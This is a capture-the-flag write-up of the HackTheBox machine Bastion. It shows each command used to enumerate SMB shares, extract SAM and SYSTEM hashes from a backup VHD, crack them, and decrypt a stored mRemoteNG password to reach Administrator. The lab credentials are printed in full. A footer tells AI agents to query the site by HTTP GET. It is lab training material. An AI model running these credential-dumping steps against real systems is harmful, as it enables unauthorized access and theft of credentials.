# Bastion Bastion is an easy-rated difficulty Windows machine from [HackTheBox](https://app.hackthebox.com/machines/186) created by L4mpje. This machine isn’t complex, but it has much noise with extra useless information, mainly because it contains a VHD (Virtual Hard Disk). In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.136.29. ### Gather Information This step is always the same, you have to ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

Ping’s output, by the TTL around 128, we know that is a Windows Machine

{% code title="Local Terminal" %} ```bash nmap -p- --open -T5 -v -n 10.129.136.29 ``` {% endcode %}

Looks like this machine have a lot of interesting stuff, nothing about a website, maybe is hosted in another port. Still we have relevant information, like port 135, 445 and 5985. Maybe we can do something like enter to the machine by SMB {% code title="Local Terminal" %} ```bash nmap -sC -sV -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.129.136.29 ``` {% endcode %}

Yep, we found an http service using the port 5985, not the default port 80. But there is no domain.

{% code title="Local Terminal" %} ```bash whatweb http://10.129.136.29:5985 ``` {% endcode %}

{% code title="Local Terminal" %} ```bash whatweb http://10.129.136.29:47001 ``` {% endcode %}

Ok, there is nothing related to websites. Looks like one with a vulnerable SMB, so let’s try to get information from that side. {% code title="Local Terminal" %} ```bash crackmapexec smb 10.129.136.29 ``` {% endcode %}

{% code title="Local Terminal" %} ```bash smbclient -L 10.129.136.29 -N ``` {% endcode %}

Always try first with a null session {% code title="Local Terminal" %} ```bash smbmap -H 10.129.136.29 -u ‘null’ ``` {% endcode %}

There is a disk where we can read and write as guest. This is a good opportunity to explore the machine with more details. {% code title="Local Terminal" %} ```bash smbclient //10.129.136.29/Backups -N ``` {% endcode %} And we are in, now your terminal called “Term” is “Backups”.

{% code title="Terminal Backups" %} ```bash get note.txt exit ``` {% endcode %} {% code title="Terminal Backups" %} ```bash cat note.txt ``` {% endcode %}

If you can access anytime through SMB, there is no hurry to download the target.

We will connect first to the backup target's disk. Login using { user: null // pass: *blank* } {% code title="Local Terminal" %} ```bash net use Z: \\10.129.136.29\Backups tree Z:\ /f ``` {% endcode %}

### Weaponization There are two vhd (Virtual Hard Drive) files, these are interesting and important to review because these are backups of the target machine, this means that are possible files related to passwords. I am using Windows so I need to use different tools. For Linux, [click here](#mount-vhs-linux). First search for Disk Management, then inside the Disk Manager: Action > Attach VHD

* DiskMan: Submit: Z:\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd If we search inside the disk, there is no flag, but we can still make use of the backup with the SAM and SYSTEM files. Go to Z:\ > Windows > System32 > config

#### Disk Mounted! {% code title="Local Terminal Z:" %} ```bash cd Z:\Windows\System32\config copy SYSTEM …\Bastion\content copy SAM …\Bastion\content ``` {% endcode %} After copying the SYSTEM and SAM files to your local machine, now you can return to your system. {% code title="Local Terminal" %} ```bash cd …\Bastion\content impacket-secretsdump -sam SAM -system SYSTEM LOCAL ``` {% endcode %}

### Exploitation Create a file called data by using **vi data** and save the captured hashed from the previous command.

{% code title="Local Terminal" %} ```bash crackmapexec smb 10.129.136.29 -u “Administrator” -H “31d6cfe0d16ae931b73c59d7e0c089c0” ``` {% endcode %}

{% code title="Local Terminal" %} ```bash john --wordlist=/usr/share/wordlists/rockyou.txt data --format=NT ``` {% endcode %}

Relevant Information: {L4mpje@bureaulampje}

{% code title="Local Terminal" %} ```bash crackmapexec smb 10.129.136.29 -u ‘L4mpje’ -p ‘bureaulampje’ ``` {% endcode %}

Ok, definitely works. We can login with L4mpje and pass bureaulampje

{% code title="Local Terminal" %} ```bash ssh L4mpje@10.129.136.29 ``` {% endcode %}

We are in, now your local command prompt called “Term” is now target user “L4mpje” {% code title="Target L4mpje" %} ```bash cd Desktop dir type user.txt ``` {% endcode %}

### Privileges Scalation {% code title="Target L4mpje" %} ```bash cd C:\Users\Administrator ``` {% endcode %}

First, you have to always check what privileges do you have. {% code title="Target L4mpje" %} ```bash whoami /priv ``` {% endcode %}

Both are not usual targets. Let’s check information about groups.

{% code title="Target L4mpje" %} ```bash whoami /all ``` {% endcode %}

{% code title="Target L4mpje" %} ```bash systeminfo ``` {% endcode %}

{% code title="Target L4mpje" %} ```bash tasklist ``` {% endcode %}

{% code title="Target L4mpje" %} ```bash cd C:\ dir ``` {% endcode %}

At this point, the best option is to navigate toward every folder.

{% code title="Target L4mpje" %} ```bash dir “C:\Program Files\” ``` {% endcode %} Or you can use **dir PROGRA\~1** to go to the first (\~1) folder with PROGRA at the start of the name.

{% code title="Target L4mpje" %} ```bash dir PROGRA~2 ``` {% endcode %}

There is a folder with a weird name... suspicious. Search for “mRemoteNG exploit” and there is something interesting here ” “. This page talks about a python script capable to decrypt the password from the log of mRemoteNG called confCons.xml located at C:\Users\\\\AppData\Roaming\mRemoteNG\\. You only have to copy the hash and use the tool {% code title="Target L4mpje" %} ```bash cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG\ dir ``` {% endcode %}

{% code title="Target L4mpje" %} ```bash type confCons.xml ``` {% endcode %}

Save the hash and close the L4mpje Terminal. Hash: aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Download the tool from or open a new terminal, this time called “LocalTerm” {% code title="Local Terminal" %} ```bash cd …/Bastion/Content git clone https://github.com/kmahyyg/mremoteng-decrypt cd mremoteng-decrypt ``` {% endcode %}

{% code title="Local Terminal" %} ```bash python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== ``` {% endcode %}

{% code title="Local Terminal" %} ```bash crackmapexec smb 10.129.136.29 -u ‘Administrator’ -p ‘thXLHM96BeKL0ER2’ ``` {% endcode %}

{% code title="Local Terminal" %} ```bash ssh Administrator@10.129.136.29 ``` {% endcode %}

Now your LocalTerm is the target Administrator. {% code title="Target Root" %} ```bash cd Desktop dir root.txt ``` {% endcode %}

### Mount VHS Linux Important information to know before: **Rmmod** linux command, **Modprobe** command linux: used to load modules and **Quemu-nbd** (apt install qemu-utils): tool used to export a QEMU disk image using NBD Protocol. asd {% code title="Local Terminal" %} ```bash mkdir /mnt/vhd modprobe nbd #Used to load a module to the system qemu-nbd -r -c /dev/nb0 “/mnt/smb/WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd” mount /dev/nbd0 /mnt/vhd cd /mnt/vhd ll ``` {% endcode %}

From here, you can do [the same](#disk-mounted). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/bastion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.